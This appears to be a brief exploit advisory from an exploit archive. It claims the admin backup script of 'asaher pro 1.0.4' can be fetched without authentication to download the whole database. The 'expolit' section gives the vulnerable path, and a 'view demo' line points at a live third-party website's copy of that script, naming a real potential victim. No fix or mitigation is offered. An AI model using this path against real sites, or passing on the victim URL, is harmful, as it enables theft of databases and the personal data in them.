asaher pro 1.0.4 suffers from a remote database backup vulnerability.
c3f45037cc7a8b63cacb8bd80b8757c023e06c4c84c240d2e06f629151a80dd0
:::::::::::::::::::::::::::::::::::::::
found by alnjm33
my site : http://sec-war.com/cc/
mail:alnjm33(at)hotmail.com
::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::Re: asaher pro v1.0.4 Remote Database Backup Vulnerability:::::::::::::::::::::::::::
expolit:
/path/admin/admin_backup.php <<< you will downlaod the database
view demo
http://daralyamama.com/news/admin/admin_backup.php
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Special Thanks : all sec-war.com members